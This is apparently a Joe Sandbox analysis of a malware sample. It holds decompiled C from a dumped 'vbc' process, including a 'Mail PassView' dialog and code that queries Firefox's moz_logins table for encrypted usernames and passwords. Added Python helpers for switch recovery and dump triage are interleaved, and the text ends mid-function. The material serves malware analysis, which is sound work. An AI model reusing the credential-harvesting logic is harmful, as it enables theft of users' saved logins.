                                                                                                                                                    						SetWindowPos( *(_t274 + 4), 0, 0, 0, _a88 - _a80 + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
                                                                                                                                                    						GetClientRect( *(_t274 + 4),  &_a80);
                                                                                                                                                    						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
                                                                                                                                                    					}
                                                                                                                                                    					_a20 = _a20 | 0x10000000;
                                                                                                                                                    					_a24 = _a24 | 0x10000000;
                                                                                                                                                    					_a8 = _a12 + 0x10;
                                                                                                                                                    					do {
                                                                                                                                                    						 *((intOrPtr*)( *_t274 + 0x1c))(_v0);
                                                                                                                                                    						_v20 = E00401562(_t274, _a92, "STATIC", _a16, _a96, _v0 + _a100.x, _t240, _a72);
                                                                                                                                                    						_v44 = E00401562(_t274, _a4, "EDIT", _v8, _a28, _v28 + _a32, _v4,  *(_t274 + 0x14) * _a8);
                                                                                                                                                    						sprintf( &_a80, "%s:", _v52->i);
                                                                                                                                                    						_t276 = _t276 + 0xc;
                                                                                                                                                    						SetWindowTextA(_v48,  &_a80);
                                                                                                                                                    						SetWindowTextA(_v52,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0xc))))))(_v60,  &_a336));
                                                                                                                                                    						_v60 = _v60 + 0x14;
                                                                                                                                                    						_v64 = _v64 +  *(_t274 + 0x14) * _v28 +  *((intOrPtr*)(_t274 + 0x18));
                                                                                                                                                    						_v68 = _v68 + 1;
                                                                                                                                                    					} while (_v68 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
                                                                                                                                                    					goto L12;
                                                                                                                                                    				}
                                                                                                                                                    				_t223 = 0;
                                                                                                                                                    				_a32 = _a32 & 0;
                                                                                                                                                    				_a8 = 0;
                                                                                                                                                    				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b0)) <= 0) {
                                                                                                                                                    					L8:
                                                                                                                                                    					_t224 = _t223 - _t240;
                                                                                                                                                    					_a28 = _a28 - _t224;
                                                                                                                                                    					_a60.x = _a60.x + _t224;
                                                                                                                                                    					_t240 = _t240 + _t224;
                                                                                                                                                    					ReleaseDC( *(_t274 + 4), _a16);
                                                                                                                                                    					goto L9;
                                                                                                                                                    				}
                                                                                                                                                    				_v0 = _a12 + 0x10;
                                                                                                                                                    				do {
                                                                                                                                                    					if(GetTextExtentPoint32A(_a16,  *_v0, strlen( *_v0),  &_a116) != 0) {
                                                                                                                                                    						_t235 = _a100.x + 0xa;
                                                                                                                                                    						if(_t235 > _v8) {
                                                                                                                                                    							_v8 = _t235;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_a16 =  &(_a16->i);
                                                                                                                                                    					_v16 = _v16 + 0x14;
                                                                                                                                                    				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
                                                                                                                                                    				_t223 = _v8;
                                                                                                                                                    				goto L8;
                                                                                                                                                    			}
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                                                                    • API String ID: 1703216249-3046471546
                                                                                                                                                    • Opcode ID: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                                                                                                                    • Instruction ID: 2f6da9a5868e125b8128a3bf626dfa5428397bb468519cd7ccc35e9b597c58da
                                                                                                                                                    • Opcode Fuzzy Hash: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                                                                                                                    • Instruction Fuzzy Hash: C9B1DE71108341AFD710DFA8C985A6BBBE9FF88704F008A2DF699D2260D775E814CF16
                                                                                                                                                    Uniqueness
                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                    			E004010E5(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
                                                                                                                                                    				struct tagPOINT _v12;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				void* _t47;
                                                                                                                                                    				struct HBRUSH__* _t56;
                                                                                                                                                    				void* _t61;
                                                                                                                                                    				unsigned int _t62;
                                                                                                                                                    				void* _t67;
                                                                                                                                                    				struct HWND__* _t68;
                                                                                                                                                    				struct HWND__* _t69;
                                                                                                                                                    				void* _t72;
                                                                                                                                                    				unsigned int _t73;
                                                                                                                                                    				struct HWND__* _t75;
                                                                                                                                                    				struct HWND__* _t76;
                                                                                                                                                    				struct HWND__* _t77;
                                                                                                                                                    				struct HWND__* _t78;
                                                                                                                                                    				unsigned int _t83;
                                                                                                                                                    				struct HWND__* _t85;
                                                                                                                                                    				struct HWND__* _t87;
                                                                                                                                                    				struct HWND__* _t88;
                                                                                                                                                    				struct tagPOINT _t94;
                                                                                                                                                    				struct tagPOINT _t96;
                                                                                                                                                    				void* _t102;
                                                                                                                                                    				void* _t113;
                                                                                                                                                    
                                                                                                                                                    				_t102 = __edx;
                                                                                                                                                    				_push(__ecx);
                                                                                                                                                    				_push(__ecx);
                                                                                                                                                    				_t47 = _a4 - 0x110;
                                                                                                                                                    				_t113 = __ecx;
                                                                                                                                                    				if(_t47 == 0) {
                                                                                                                                                    					__eflags =  *0x417348;
                                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                                    						SetDlgItemTextA( *(__ecx + 4), 0x3ee, 0x417348);
                                                                                                                                                    					} else {
                                                                                                                                                    						ShowWindow(GetDlgItem( *(__ecx + 4), 0x3ed), 0);
                                                                                                                                                    						ShowWindow(GetDlgItem( *(_t113 + 4), 0x3ee), 0);
                                                                                                                                                    					}
                                                                                                                                                    					SetWindowTextA( *(_t113 + 4), "Mail PassView");
                                                                                                                                                    					SetDlgItemTextA( *(_t113 + 4), 0x3ea, _t113 + 0xc);
                                                                                                                                                    					SetDlgItemTextA( *(_t113 + 4), 0x3ec, _t113 + 0x10b);
                                                                                                                                                    					E00401085(_t113, __eflags);
                                                                                                                                                    					E00406491(_t102,  *(_t113 + 4));
                                                                                                                                                    					goto L29;
                                                                                                                                                    				} else {
                                                                                                                                                    					_t61 = _t47 - 1;
                                                                                                                                                    					if(_t61 == 0) {
                                                                                                                                                    						_t62 = _a8;
                                                                                                                                                    						__eflags = _t62 - 1;
                                                                                                                                                    						if(_t62 != 1) {
                                                                                                                                                    							goto L29;
                                                                                                                                                    						} else {
                                                                                                                                                    							__eflags = _t62 >> 0x10;
                                                                                                                                                    							if(_t62 >> 0x10 != 0) {
                                                                                                                                                    								goto L29;
                                                                                                                                                    							} else {
                                                                                                                                                    								EndDialog( *(__ecx + 4), 1);
                                                                                                                                                    								DeleteObject( *(_t113 + 0x20c));
                                                                                                                                                    								goto L8;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    					} else {
                                                                                                                                                    						_t67 = _t61 - 0x27;
                                                                                                                                                    						if(_t67 == 0) {
                                                                                                                                                    							_t68 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                                                                                                                    							__eflags = _a12 - _t68;
                                                                                                                                                    							if(_a12 != _t68) {
                                                                                                                                                    								__eflags =  *0x417388;
                                                                                                                                                    								if( *0x417388 == 0) {
                                                                                                                                                    									goto L29;
                                                                                                                                                    								} else {
                                                                                                                                                    									_t69 = GetDlgItem( *(_t113 + 4), 0x3ee);
                                                                                                                                                    									__eflags = _a12 - _t69;
                                                                                                                                                    									if(_a12 != _t69) {
                                                                                                                                                    										goto L29;
                                                                                                                                                    									} else {
                                                                                                                                                    										goto L18;
                                                                                                                                                    									}
                                                                                                                                                    								}
                                                                                                                                                    							} else {
                                                                                                                                                    								L18:
                                                                                                                                                    								SetBkMode(_a8, 1);
                                                                                                                                                    								SetTextColor(_a8, 0xc00000);
                                                                                                                                                    								_t56 = GetSysColorBrush(0xf);
                                                                                                                                                    							}
                                                                                                                                                    						} else {
                                                                                                                                                    							_t72 = _t67 - 0xc8;
                                                                                                                                                    							if(_t72 == 0) {
                                                                                                                                                    								_t73 = _a12;
                                                                                                                                                    								_t94 = _t73 & 0x0000ffff;
                                                                                                                                                    								_v12.x = _t94;
                                                                                                                                                    								_v12.y = _t73 >> 0x10;
                                                                                                                                                    								_t75 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                                                                                                                    								_push(_v12.y);
                                                                                                                                                    								_a8 = _t75;
                                                                                                                                                    								_t76 = ChildWindowFromPoint( *(_t113 + 4), _t94);
                                                                                                                                                    								__eflags = _t76 - _a8;
                                                                                                                                                    								if(_t76 != _a8) {
                                                                                                                                                    									__eflags =  *0x417388;
                                                                                                                                                    									if( *0x417388 == 0) {
                                                                                                                                                    										goto L29;
                                                                                                                                                    									} else {
                                                                                                                                                    										_t77 = GetDlgItem( *(_t113 + 4), 0x3ee);
                                                                                                                                                    										_push(_v12.y);
                                                                                                                                                    										_t78 = ChildWindowFromPoint( *(_t113 + 4), _v12.x);
                                                                                                                                                    										__eflags = _t78 - _t77;
                                                                                                                                                    										if(_t78 != _t77) {
                                                                                                                                                    											goto L29;
                                                                                                                                                    										} else {
                                                                                                                                                    											goto L13;
                                                                                                                                                    										}
                                                                                                                                                    									}
                                                                                                                                                    								} else {
                                                                                                                                                    									L13:
                                                                                                                                                    									SetCursor(LoadCursorA( *0x416b94, 0x67));
                                                                                                                                                    									goto L8;
                                                                                                                                                    								}
                                                                                                                                                    							} else {
                                                                                                                                                    								if(_t72 != 0) {
                                                                                                                                                    									L29:
                                                                                                                                                    									_t56 = 0;
                                                                                                                                                    									__eflags = 0;
                                                                                                                                                    								} else {
                                                                                                                                                    									_t83 = _a12;
                                                                                                                                                    									_t96 = _t83 & 0x0000ffff;
                                                                                                                                                    									_v12.x = _t96;
                                                                                                                                                    									_v12.y = _t83 >> 0x10;
                                                                                                                                                    									_t85 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                                                                                                                    									_push(_v12.y);
                                                                                                                                                    									_a8 = _t85;
                                                                                                                                                    									if(ChildWindowFromPoint( *(_t113 + 4), _t96) != _a8) {
                                                                                                                                                    										__eflags =  *0x417388;
                                                                                                                                                    										if( *0x417388 == 0) {
                                                                                                                                                    											goto L29;
                                                                                                                                                    										} else {
                                                                                                                                                    											_t87 = GetDlgItem( *(_t113 + 4), 0x3ee);
                                                                                                                                                    											_push(_v12.y);
                                                                                                                                                    											_t88 = ChildWindowFromPoint( *(_t113 + 4), _v12);
                                                                                                                                                    											__eflags = _t88 - _t87;
                                                                                                                                                    											if(_t88 != _t87) {
                                                                                                                                                    												goto L29;
                                                                                                                                                    											} else {
                                                                                                                                                    												_push(0x417388);
                                                                                                                                                    												goto L7;
                                                                                                                                                    											}
                                                                                                                                                    										}
                                                                                                                                                    									} else {
                                                                                                                                                    										_push(_t113 + 0x10b);
                                                                                                                                                    										L7:
                                                                                                                                                    										_push( *(_t113 + 4));
                                                                                                                                                    										E00406523();
                                                                                                                                                    										L8:
                                                                                                                                                    										_t56 = 1;
                                                                                                                                                    									}
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				return _t56;
                                                                                                                                                    			}
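The decompiled procedure above is a compiled `switch` on the dialog message: the decompiler renders it as a chain of subtractions from the message argument `_a4` (0x110, then 1, 0x27, 0xc8), so the absolute case values are only visible once the chain is summed. The following is an added example, not part of the Joe Sandbox report or of the analysed sample: a small parser that recovers those case values, the dialog control IDs and the Win32 API calls from decompiled text in this style. The sample text is copied from E004010E5 above; the WM_ names, the COLORREF layout and the lParam point layout are documented Win32 values. The last case in E004010E5 (the branch guarded by `_t72 != 0`) cannot be recovered from the report text, so it is left unnamed.

```python
"""Added example (not part of the Joe Sandbox report or of the analysed sample):
recover the Win32 message switch, dialog control IDs and API calls from a
decompiled dialog procedure such as E004010E5. Decompilers emit a compiled
`switch(uMsg)` as a chain of subtractions from the message parameter (_a4);
summing the chain gives the absolute case values."""
import re

# Documented Win32 message values. The final case of E004010E5 is not
# recoverable from the report text, so it is deliberately not listed here.
WM_NAMES = {
    0x0110: "WM_INITDIALOG",
    0x0111: "WM_COMMAND",
    0x0138: "WM_CTLCOLORSTATIC",
    0x0200: "WM_MOUSEMOVE",
}

# Constructed sample: the lines of E004010E5 the parser needs, copied from the
# report. Names such as _t47, 0x3ee and E00406523 are the decompiler's.
SAMPLE = """
    _t47 = _a4 - 0x110;
    _t113 = __ecx;
    if(_t47 == 0) {
        SetDlgItemTextA( *(__ecx + 4), 0x3ee, 0x417348);
        ShowWindow(GetDlgItem( *(__ecx + 4), 0x3ed), 0);
        SetWindowTextA( *(_t113 + 4), "Mail PassView");
        SetDlgItemTextA( *(_t113 + 4), 0x3ea, _t113 + 0xc);
        SetDlgItemTextA( *(_t113 + 4), 0x3ec, _t113 + 0x10b);
    } else {
        _t61 = _t47 - 1;
        if(_t61 == 0) {
            EndDialog( *(__ecx + 4), 1);
        } else {
            _t67 = _t61 - 0x27;
            if(_t67 == 0) {
                _t68 = GetDlgItem( *(__ecx + 4), 0x3ec);
                SetTextColor(_a8, 0xc00000);
                _t56 = GetSysColorBrush(0xf);
            } else {
                _t72 = _t67 - 0xc8;
                if(_t72 == 0) {
                    SetCursor(LoadCursorA( *0x416b94, 0x67));
                }
                _push( *(_t113 + 4));
                E00406523();
            }
        }
    }
"""

CHAIN_RE = re.compile(r"(_t\d+)\s*=\s*(_a\d+|_t\d+)\s*-\s*(0x[0-9a-fA-F]+|\d+)\s*;")
CTRL_RE = re.compile(
    r"(?:GetDlgItem|SetDlgItemTextA)\(\s*\*\([^)]*\)\s*,\s*(0x[0-9a-fA-F]+)\s*[,)]")
API_RE = re.compile(r"\b([A-Z][A-Za-z0-9]*)\(")


def recover_switch(text, param="_a4"):
    """Follow `_tN = prev - k;` assignments starting at the message parameter
    and return [(temp, absolute_case, name)] in chain order."""
    assigns = {dst: (src, int(k, 0)) for dst, src, k in CHAIN_RE.findall(text)}
    next_of = {src: dst for dst, (src, _) in assigns.items()}
    cases, cur, total = [], param, 0
    while cur in next_of:
        cur = next_of[cur]
        total += assigns[cur][1]
        cases.append((cur, total, WM_NAMES.get(total, "unknown")))
    return cases


def control_ids(text):
    """Dialog control IDs referenced through GetDlgItem / SetDlgItemTextA."""
    return sorted({int(v, 16) for v in CTRL_RE.findall(text)})


def api_calls(text):
    """Imported API names called, ignoring decompiler-generated E00xxxxxx names."""
    return sorted({n for n in API_RE.findall(text)
                   if not re.fullmatch(r"E[0-9A-F]{8}", n)})


def colorref_to_rgb(value):
    """COLORREF is laid out 0x00BBGGRR, so SetTextColor(hdc, 0xc00000) is blue."""
    return (value & 0xFF, (value >> 8) & 0xFF, (value >> 16) & 0xFF)


def split_point(lparam):
    """Win32's GET_X_LPARAM / GET_Y_LPARAM sign-extend the two 16-bit halves.
    The decompiled code uses `& 0xffff` and `>> 0x10` (unsigned LOWORD/HIWORD),
    which gives different values for points left of or above the client area."""
    x, y = lparam & 0xFFFF, (lparam >> 16) & 0xFFFF
    return (x - 0x10000 if x & 0x8000 else x, y - 0x10000 if y & 0x8000 else y)


if __name__ == "__main__":
    for temp, value, name in recover_switch(SAMPLE):
        print(f"{temp}: case 0x{value:04x} ({name})")
    print("control IDs:", [hex(c) for c in control_ids(SAMPLE)])
    print("APIs:", api_calls(SAMPLE))
```

Run against the sample, the chain resolves to WM_INITDIALOG, WM_COMMAND (where `_a8 == 1` is IDOK), WM_CTLCOLORSTATIC and WM_MOUSEMOVE, the controls referenced are 0x3ea, 0x3ec, 0x3ed and 0x3ee, and the text colour 0xc00000 decodes to RGB(0, 0, 192); `GetSysColorBrush(0xf)` is COLOR_3DFACE. The same approach applies to any other decompiled window or dialog procedure in the report.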
Address column (Joe Sandbox maps each C-code line above to the instruction address it was lifted from; 0x00000000 marks lines with no mapped instruction):
0x004010e5 0x004010e8 0x004010e9 0x004010ed 0x004010f5 0x004010f7 0x004012b2
0x004012b9 0x004012f4 0x004012bb 0x004012d4 0x004012e3 0x004012e3 0x00401302
0x0040131a 0x0040132b 0x0040132d 0x00401335 0x00000000 0x004010fd 0x004010fd
0x004010fe 0x0040127d 0x00401280 0x00401284 0x00000000 0x0040128a 0x0040128d
0x00401290 0x00000000 0x00401296 0x0040129b 0x004012a7 0x00000000 0x004012a7
0x00401290 0x00401104 0x00401104 0x00401107 0x0040122e 0x00401230 0x00401233
0x0040125b 0x00401262 0x00000000 0x00401268 0x00401270 0x00401272 0x00401275
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040127b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040127b
                                                                                                                                                    0x00401275
                                                                                                                                                    0x00401235
                                                                                                                                                    0x00401235
                                                                                                                                                    0x0040123a
                                                                                                                                                    0x00401248
                                                                                                                                                    0x00401250
                                                                                                                                                    0x00401250
                                                                                                                                                    0x0040110d
                                                                                                                                                    0x0040110d
                                                                                                                                                    0x00401112
                                                                                                                                                    0x004011a2
                                                                                                                                                    0x004011ab
                                                                                                                                                    0x004011b9
                                                                                                                                                    0x004011bc
                                                                                                                                                    0x004011bf
                                                                                                                                                    0x004011c1
                                                                                                                                                    0x004011c4
                                                                                                                                                    0x004011d1
                                                                                                                                                    0x004011d3
                                                                                                                                                    0x004011d6
                                                                                                                                                    0x004011f2
                                                                                                                                                    0x004011f9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004011ff
                                                                                                                                                    0x00401207
                                                                                                                                                    0x00401209
                                                                                                                                                    0x00401214
                                                                                                                                                    0x00401216
                                                                                                                                                    0x00401218
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040121e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040121e
                                                                                                                                                    0x00401218
                                                                                                                                                    0x004011d8
                                                                                                                                                    0x004011d8
                                                                                                                                                    0x004011e7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004011e7
                                                                                                                                                    0x00401118
                                                                                                                                                    0x0040111a
                                                                                                                                                    0x0040133b
                                                                                                                                                    0x0040133b
                                                                                                                                                    0x0040133b
                                                                                                                                                    0x00401120
                                                                                                                                                    0x00401120
                                                                                                                                                    0x00401129
                                                                                                                                                    0x00401137
                                                                                                                                                    0x0040113a
                                                                                                                                                    0x0040113d
                                                                                                                                                    0x0040113f
                                                                                                                                                    0x00401142
                                                                                                                                                    0x00401154
                                                                                                                                                    0x0040116f
                                                                                                                                                    0x00401176
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040117c
                                                                                                                                                    0x00401184
                                                                                                                                                    0x00401186
                                                                                                                                                    0x00401191
                                                                                                                                                    0x00401193
                                                                                                                                                    0x00401195
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040119b
                                                                                                                                                    0x0040119b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040119b
                                                                                                                                                    0x00401195
                                                                                                                                                    0x00401156
                                                                                                                                                    0x0040115c
                                                                                                                                                    0x0040115d
                                                                                                                                                    0x0040115d
                                                                                                                                                    0x00401160
                                                                                                                                                    0x00401167
                                                                                                                                                    0x00401169
                                                                                                                                                    0x00401169
                                                                                                                                                    0x00401154
                                                                                                                                                    0x0040111a
                                                                                                                                                    0x00401112
                                                                                                                                                    0x00401107
                                                                                                                                                    0x004010fe
                                                                                                                                                    0x00401341

Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Similarity
• API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObject
• String ID: Mail PassView
• API String ID: 3628558512-272225179
• Opcode ID: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
• Instruction ID: a5e01e197ecdabf9e6bdb75eaf1794657044b10619e6b9182d208ef804a260cb
• Opcode Fuzzy Hash: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
• Instruction Fuzzy Hash: 68518130044248BFEB259F60DE85EAE7BB5EB04700F10853AFA56E65F0C7759D61EB08
Uniqueness
• Uniqueness Score: -1.00%

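The memory dump source above names a region dumped from process 0xF (vbc, per the snapshot name hcaresult_15_2_400000_vbc.jbxd) at base 0x400000 with protection 0x40 and type 0x20000, and the report says the dump is based on a PE. A PE header sitting in private, RWX memory rather than in a loader-mapped image is the artifact that unpacking or process hollowing leaves behind, and it is what an analyst should confirm before carving the payload. The following Python script is an added example, not code from the Joe Sandbox report: it decodes such a dump name, validates the MZ/PE header at the start of the dumped bytes, and flags the indicators. The sdmp field layout (pid, dump index, id, base, protection, an undecoded field, memory type, an undecoded field) is an assumption inferred from the snapshot name; the PAGE_* and MEM_* constants are the documented Win32 values; the dumped bytes are constructed for the example and are not the sample's.

```python
"""Triage a Joe Sandbox memory-dump source line and the dumped bytes.

Example (added, not from the report): decode
  0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp
and check a raw dump for a PE header in private RWX memory plus marker strings.
The sdmp field layout is an ASSUMPTION inferred from the report; the Win32
constants are the documented winnt.h values.
"""
import re
import struct

# Documented Win32 page protection and memory type constants (winnt.h).
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: pid.dump.id.base.protect.<unknown>.type.<unknown>.sdmp
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<uid>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f5>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<f7>[0-9A-Fa-f]{8})\.sdmp$"
)


def parse_sdmp_name(name):
    """Decode the dump file name into pid, dump index, base, protection, type."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError("not an sdmp name: %r" % name)
    protect = int(m.group("protect"), 16)
    mtype = int(m.group("type"), 16)
    return {
        "pid": int(m.group("pid"), 16),
        "dump": int(m.group("dump"), 16),
        "base": int(m.group("base"), 16),
        "protect": PAGE_PROTECTIONS.get(protect & 0xFF, hex(protect)),
        "type": MEM_TYPES.get(mtype, hex(mtype)),
    }


def pe_header_info(blob):
    """Return (is_pe, number_of_sections, image_base) for a region dump whose
    first bytes should be a DOS/PE header; (False, 0, 0) if the header is absent."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return (False, 0, 0)
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if e_lfanew + 0x40 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return (False, 0, 0)
    num_sections = struct.unpack_from("<H", blob, e_lfanew + 6)[0]
    opt = e_lfanew + 0x18                      # IMAGE_OPTIONAL_HEADER follows the file header
    magic = struct.unpack_from("<H", blob, opt)[0]
    if magic == 0x10B:                         # PE32: ImageBase at optional header + 0x1C
        image_base = struct.unpack_from("<I", blob, opt + 0x1C)[0]
    elif magic == 0x20B:                       # PE32+: ImageBase at optional header + 0x18
        image_base = struct.unpack_from("<Q", blob, opt + 0x18)[0]
    else:
        return (True, num_sections, 0)
    return (True, num_sections, image_base)


def find_markers(blob, markers=("Mail PassView", "SetCurrentDirectoryA")):
    """Locate marker strings in ASCII and UTF-16LE; returns {marker: [(encoding, offset)]}."""
    hits = {}
    for marker in markers:
        offsets = []
        for enc in ("ascii", "utf-16-le"):
            needle = marker.encode(enc)
            i = blob.find(needle)
            while i != -1:
                offsets.append((enc, i))
                i = blob.find(needle, i + 1)
        hits[marker] = offsets
    return hits


def triage(sdmp_name, blob):
    """Combine name metadata and header checks into a list of indicator strings."""
    meta = parse_sdmp_name(sdmp_name)
    is_pe, _, image_base = pe_header_info(blob)
    findings = []
    if is_pe and meta["type"] == "MEM_PRIVATE":
        findings.append("PE header in MEM_PRIVATE memory (not a loader-mapped image)")
    if meta["protect"] == "PAGE_EXECUTE_READWRITE":
        findings.append("region is RWX")
    if is_pe and image_base == meta["base"]:
        findings.append("dump base 0x%x equals PE ImageBase" % image_base)
    for name, offsets in find_markers(blob).items():
        if offsets:
            where = ", ".join("%s+0x%x" % (enc, off) for enc, off in offsets)
            findings.append("marker %r at %s" % (name, where))
    return meta, findings


def build_sample_dump():
    """CONSTRUCTED stand-in for the dumped region: a minimal PE32 header with
    ImageBase 0x400000 followed by two strings. Not the real sample's bytes."""
    hdr = bytearray(0x200)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)                # e_lfanew
    hdr[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<HH", hdr, 0x84, 0x14C, 2)           # IMAGE_FILE_MACHINE_I386, 2 sections
    struct.pack_into("<H", hdr, 0x94, 0xE0)                # SizeOfOptionalHeader
    opt = 0x80 + 0x18
    struct.pack_into("<H", hdr, opt, 0x10B)                # PE32 magic
    struct.pack_into("<I", hdr, opt + 0x1C, 0x400000)      # ImageBase
    return (bytes(hdr) + b"Mail PassView\0" + b"SetCurrentDirectoryA\0"
            + "Mail PassView".encode("utf-16-le"))


if __name__ == "__main__":
    name = "0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp"
    meta, findings = triage(name, build_sample_dump())
    print(meta)
    for f in findings:
        print(" -", f)
```

On a real dump, replace build_sample_dump() with the bytes of the .sdmp file; the ImageBase comparison is what tells a relocated, hollowed payload apart from an image that merely happens to be private memory.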
C-Code - Quality: 73%
			E0040CE28(void* __ecx, void* __eflags, intOrPtr _a4, char* _a8) {
				char* _v8;
				int _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				int* _v28;
				char* _v32;
				int _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				void _v331;
				int _v332;
				void _v587;
				int _v588;
				void _v851;
				char _v852;
				void _v1378;
				short _v1380;
				void _v1995;
				char _v1996;
				void _v2611;
				char _v2612;
				char _v3636;
				char _v4660;
				char _v5684;
				char _v6708;
				char _v7732;
				void _v8755;
				char _v8756;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t115;
				signed int _t116;
				int _t118;
				void* _t130;
				char* _t170;
				intOrPtr _t175;
				char* _t177;
				int _t196;
				intOrPtr _t226;
				void* _t229;
				int* _t232;
				char* _t235;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t240;

				E004118A0(0x2234, __ecx);
				_t226 = _a4;
				_t232 = _t226 + 0x30;
				_v28 = _t232;
				_t115 = E0040DEEE(_t232, _t226 + 0x362);
				if(_t115 == 0) {
					L43:
					return _t115;
				}
				_t116 = _t232[1];
				_t196 = 0;
				if(_t116 == 0) {
					_t115 = _t116 | 0xffffffff;
				} else {
					_t115 =  *_t116(_t226 + 0x158);
				}
				if(_t115 != _t196) {
					L41:
					if( *_t232 == _t196) {
						goto L43;
					}
					_t118 = SetCurrentDirectoryA( &(_t232[8]));
					 *_t232 = _t196;
					return _t118;
				} else {
					_v36 = _t196;
					if(E0040F64B( &_v72, _t226 + 0x362) == 0) {
						L39:
						_t232 = _v28;
						_t115 = _t232[2];
						if(_t115 != _t196) {
							_t115 =  *_t115();
						}
						goto L41;
                                                                                                                                                    					} else {
                                                                                                                                                    						_v12 = _t196;
                                                                                                                                                    						_v1380 = _t196;
                                                                                                                                                    						memset( &_v1378, _t196, 0x208);
                                                                                                                                                    						_v852 = _t196;
                                                                                                                                                    						memset( &_v851, _t196, 0x104);
                                                                                                                                                    						_t239 = _t238 + 0x18;
                                                                                                                                                    						MultiByteToWideChar(_t196, _t196, _a8, 0xffffffff,  &_v1380, 0x104);
                                                                                                                                                    						WideCharToMultiByte(0xfde9, _t196,  &_v1380, 0xffffffff,  &_v852, 0x104, _t196, _t196);
                                                                                                                                                    						if(_v72 != _t196) {
                                                                                                                                                    							_v72( &_v852,  &_v12);
                                                                                                                                                    						}
                                                                                                                                                    						if(_v12 == _t196) {
                                                                                                                                                    							goto L39;
                                                                                                                                                    						}
                                                                                                                                                    						_a8 = _t196;
                                                                                                                                                    						if(_v68 != _t196) {
                                                                                                                                                    							_v68(_v12, "SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins", 0xffffffff,  &_a8,  &_v76);
                                                                                                                                                    							_t239 = _t239 + 0x14;
                                                                                                                                                    						}
                                                                                                                                                    						L11:
                                                                                                                                                    						L11:
                                                                                                                                                    						if(_v64 == _t196) {
                                                                                                                                                    							_t130 = 0xffff;
